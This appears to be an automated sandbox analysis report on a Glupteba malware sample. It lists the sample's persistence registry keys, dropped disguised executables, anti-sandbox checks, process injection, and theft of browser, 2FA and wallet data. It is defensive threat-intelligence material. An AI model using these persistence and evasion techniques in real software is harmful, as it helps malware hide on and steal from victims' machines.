glupteba | c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	C830.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	C830.exe

Loads dropped DLL 64 IoCs

pid	Process
1912	setup_x86_x64_install.exe
1284	setup_installer.exe
1284	setup_installer.exe
1284	setup_installer.exe
1284	setup_installer.exe
1284	setup_installer.exe
1284	setup_installer.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
700	cmd.exe
700	cmd.exe
1756	cmd.exe
1756	cmd.exe
1732	cmd.exe
1816	cmd.exe
1532	Sun05532f7abc.exe
1532	Sun05532f7abc.exe
1432	cmd.exe
1432	cmd.exe
1672	Sun05ac1b0207d3ff3b8.exe
1672	Sun05ac1b0207d3ff3b8.exe
392	cmd.exe
948	cmd.exe
1792	Sun05640630a6aa.exe
1792	Sun05640630a6aa.exe
360	cmd.exe
1600	cmd.exe
2052	cmd.exe
2052	cmd.exe
2148	Sun054fe19a12cb3.exe
2148	Sun054fe19a12cb3.exe
2184	Sun05fa3b4d2ae56e.exe
2184	Sun05fa3b4d2ae56e.exe
2148	Sun054fe19a12cb3.exe
2080	Sun05d60bc3b96248e5.exe
2080	Sun05d60bc3b96248e5.exe
2288	Sun054fe19a12cb3.tmp
2288	Sun054fe19a12cb3.tmp
2288	Sun054fe19a12cb3.tmp
2288	Sun054fe19a12cb3.tmp
2900	1097815.exe
2900	1097815.exe
2848	rundll32.exe
2848	rundll32.exe
2848	rundll32.exe
2848	rundll32.exe
2956	LzmwAqmV.exe
2956	LzmwAqmV.exe
3060	2977511.exe
3060	2977511.exe
1504	6577916.exe
1504	6577916.exe
2956	LzmwAqmV.exe
2900	1097815.exe
2304	WinHoster.exe
2304	WinHoster.exe
2956	LzmwAqmV.exe
2956	LzmwAqmV.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Adobe\\Baenaeshashupo.exe\""	46807GHF____.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1097815.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	C830.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\R:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Program crash 7 IoCs

pid	pid_target	Process	procid_target
2444	1672	WerFault.exe	41
3236	2836	WerFault.exe	60
3704	3060	WerFault.exe	64
3748	2312	WerFault.exe	96
3780	900	WerFault.exe	103
3892	1504	WerFault.exe	68
3472	3100	WerFault.exe	158

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2772	C830.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3060 set thread context of 1688	3060	2977511.exe	97
PID 820 set thread context of 904	820	postback.exe	99
PID 2156 set thread context of 4028	2156	services64.exe	129

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Baenaeshashupo.exe	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File created	C:\Program Files\Java\XSBWTJYDRA\ultramediaburner.exe	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-T4S0A.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-027EK.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-3I3MV.tmp	setup_2.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files\Java\XSBWTJYDRA\ultramediaburner.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\Adobe\Baenaeshashupo.exe.config	46807GHF____.exe

Drops file in Windows directory 30 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI4DD8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3F35.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3330.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI785C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\f7bc497.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f7bc497.msi	msiexec.exe
File created	C:\Windows\Installer\f7bc499.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI15EE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C4B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB360.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB2FC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF589.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1588.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4964.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF294.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6511.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI234.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBAE0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID9D6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI15DE.tmp	msiexec.exe
File created	C:\Windows\Installer\f7bc49b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4510.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI51FE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDAC8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f7bc499.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcjdgdd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcjdgdd
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcjdgdd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rZm0TSOCq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rZm0TSOCq.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2392	schtasks.exe
1996	schtasks.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1908	taskkill.exe
2256	taskkill.exe
2732	taskkill.exe
2184	taskkill.exe
3764	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3080e2f400a8d701	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338234962"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000005cdb9164b7d7e5be7e2dd5e0177a6cd926375b657a0465ef26f9ac659ebbf216000000000e8000000002000020000000a0872de4651f5ff48012567328a9e171e253b2fdd868f740e7dfea7f5e93ba632000000089b8eeddfd5fc7d981653c4d316b175c49203d54d7b48ed67784254cebe8d75a4000000035da1caacfca262c5bfeb11fae25bad77dc501c24e7e4d093ae37e0f959d4972c71f47fc8dc914eb951ac39e81dd7b8802d81c4d69a942ccc28c6624a93f3986	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000c11bfb84bde346a316af208d25221814ca7801ff710363515ee37619569ed47b000000000e800000000200002000000035765ec13c8bc9d1fe35e575a6ee2d70de5ba86557e1d2849effd2c6e9c2da9c90000000c5fc7a3a55cce7bb27c52f81bcc2ea264991208ed0c86cc31321f645c5c68223c02e31a39be7fba5a6082acf6b8a04dffdb35adb9591ca7a7fddc00525336eed415967310949c0a47e2b62200b2fa0e1dfdb8875a5e0b55656d8d2b23daac8ace7142287d13cf57d2f63b0c85b684e902ae2c93cd0180fd192208acdebb1039844b94227270ea61f50c6dfa31e364be340000000ded375d685b1c0aa673b70b8566c7a21ae8919ad77601b879eada2cb6def75f975f458410c17dbf7d4f3b85094b37b770a7a34472e58d14672bb2ae308117499	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{68B175D0-13F4-11EC-A597-4E684FBC3E3F} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	LzmwAqmV.exe
